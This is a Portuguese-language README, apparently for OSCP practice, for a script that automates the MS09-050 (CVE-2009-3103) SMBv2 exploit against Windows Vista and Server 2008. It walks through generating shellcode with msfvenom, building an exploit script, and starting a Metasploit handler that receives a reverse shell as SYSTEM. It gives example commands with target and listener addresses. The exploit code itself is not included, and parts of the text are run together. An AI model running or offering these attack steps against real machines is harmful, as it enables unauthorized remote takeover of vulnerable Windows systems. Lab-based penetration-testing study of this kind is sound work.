
Wrapper automatizado de exploit para MS09-050 (CVE-2009-3103) direcionado ao SMBv2 no Windows Vista/Server 2008. Gera shellcode, constrói o exploit e cria um handler do Metasploit para acesso ao shell como SYSTEM.
Configuração em uma linha para exploração do MS09-050 (CVE-2009-3103). Sem complicação, sem depuração, simplesmente funciona.
A maioria dos scripts MS09-050 por aí exige injeção manual de shellcode, tem problemas de temporização com handlers, ou simplesmente não funciona. Este wrapper:
Feito para a preparação do OSCP, onde tempo é crucial.
msfvenommsfconsolepython2rpcclient (geralmente pré-instalado)./ms09_050.sh <TARGET_IP> <YOUR_IP> [PORT]
./ms09_050.sh 192.168.233.40 192.168.45.232 443
Saída:
[*] Target: 192.168.233.40 | LHOST: 192.168.45.232 | LPORT: 443
[*] Generating shellcode...
[+] Files created:
- exploit.py
- handler.rc
=== RUN ===
Terminal 1: msfconsole -q -r handler.rc
Terminal 2: python2 exploit.py 192.168.233.40
Terminal 1 - Inicie o handler:
msfconsole -q -r handler.rc
Aguarde por: Started reverse TCP handler on ...
Terminal 2 - Execute o exploit:
python2 exploit.py 192.168.233.40
Verifique no Terminal 1 se você obteve o shell.
windows/shell/reverse_tcp) - funciona de forma confiável com o stager neste exploitExploit original baseado no PoC MS09-050 do ohnozzy.
MIT - Faça o que quiser, apenas não seja mau.